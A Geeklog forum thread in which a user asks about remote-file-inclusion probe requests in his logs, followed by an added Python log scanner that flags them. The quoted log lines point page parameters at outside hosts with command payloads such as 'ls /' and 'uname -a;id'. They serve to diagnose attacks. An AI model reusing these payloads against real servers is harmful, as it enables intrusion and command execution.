
Geeklog Forums

Is this a security issue?



arthur

Forum User
Junior
Registered: 10/10/03
Posts: 34
This month I've seen entries like this in my logfiles for shrednow.com:

/article.php?story=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/index.php?topic=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/users.php?mode=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/comment.php?sid=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/store.php?item=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/pollbooth.php?qid=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/usersettings.php?mode=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=l

/profiles.php?sid=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/staticpages/index.php?page=http://s4y.vila.bol.com.br/cse.gif?&cmd=uname -a;id

http://www.shrednow.com/index.php?topic=http://members.lycos.co.uk/b0xz14/db/cat.txt?&cmd=uptime

Do I need to worry about this?
Arthur (http://www.shrednow.com)

ScurvyDawg

Forum User
Full Member
Registered: 11/06/02
Posts: 523
Now I am not sure about the questions you post in your question above; I will have to leave that to others to address.

I do however think it is inappropriate to show what version you are running in the footer of your site. Then if anyone does know of a vulnerability for the version you are running then they know they can take advantage of it on your site. I remove the version tag from my themes. That's one small thing you can do to make it tougher on crackers.

Nice site, good to see you finally got the cafepress store going.

Cool

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Quote by arthur: Do I need to worry about this?

No.

Someone who doesn't seem to know how Geeklog works is trying out some recipes from a script kiddie's cookbook. Geeklog will either filter these out or, e.g. in case of the topic id, will try to find the URL as a topic in the database - which fails, of course, and produces a friendly error message.

These attacks are probably targeted at some other script or CMS that has a vulnerability in that area.

bye, Dirk
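The requests in arthur's log all have one shape: a page parameter whose value is a remote URL, followed by a separate cmd= parameter, which is the pattern of a remote-file-inclusion probe. As an added example (not part of the thread and not Geeklog code), here is a log check that flags that shape; the function names and the two benign sample lines are made up for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# A parameter value that starts with an absolute or protocol-relative URL.
REMOTE_URL = re.compile(r"^(?:(?:https?|ftp):)?//([^/\s?#]+)", re.IGNORECASE)

def inspect_request(request):
    """Return one finding per parameter whose value is a remote URL."""
    target, _, query = request.partition("?")   # split at the first '?' only
    # Logged target may be a bare path or a full URL; keep only the path.
    script = re.sub(r"^[a-z]+://[^/]*", "", target, flags=re.IGNORECASE)
    params = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name:
            params.append((unquote_plus(name), unquote_plus(value).strip()))
    # The probes also carry a separate cmd= parameter meant for the included file.
    has_cmd = any(name.lower() == "cmd" for name, _ in params)
    findings = []
    for name, value in params:
        match = REMOTE_URL.match(value)
        if match:
            findings.append({"script": script, "param": name,
                             "remote_host": match.group(1).lower(),
                             "cmd_param": has_cmd})
    return findings

def scan(lines):
    """Count flagged requests per remote host across a batch of log lines."""
    hosts = Counter()
    for line in lines:
        for finding in inspect_request(line.strip()):
            hosts[finding["remote_host"]] += 1
    return hosts

# The first three lines are quoted from the post above; the last two are
# constructed benign requests for comparison.
SAMPLE = [
    "/article.php?story=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /",
    "/staticpages/index.php?page=http://s4y.vila.bol.com.br/cse.gif?&cmd=uname -a;id",
    "http://www.shrednow.com/index.php?topic=http://members.lycos.co.uk/b0xz14/db/cat.txt?&cmd=uptime",
    "/article.php?story=20031114171400123",
    "/index.php?topic=General",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect_request(line) or "ok", "<-", line)
```

A hit only means the request was attempted; whether it did anything depends on how the application treats the parameter, which is the point Dirk makes above.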

geoff

Anonymous
It is a security thing. I have, or rather had, a php-nuke website based on a motorcycle event in Ireland. I looked at the site yesterday to see that it had been attacked and a story added which said "spykids ownz you".

They can inject the database that runs the website, add the story and create a new god admin.

A Google search will show you some of the websites they have attacked.

I have subsequently changed the site to cpg-nuke, which is harder to hack and also shows IP addresses of any attackers.

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Quote by geoff: it is a security thing.

Well, not for Geeklog

bye, Dirk

ScurvyDawg

Forum User
Full Member
Registered: 11/06/02
Posts: 523
LOL

Fool, you use Nuke.

LMAO

drshakagee

Forum User
Full Member
Registered: 10/01/03
Posts: 231
Quote by geoff: A Google search will show you some of the websites they have attacked.

I did a Google search and didn't see any Geeklog sites out of the 3700ish on there. Granted I didn't look at all of them, but none of the ones I did look at were using Geeklog.
Yes I am mental.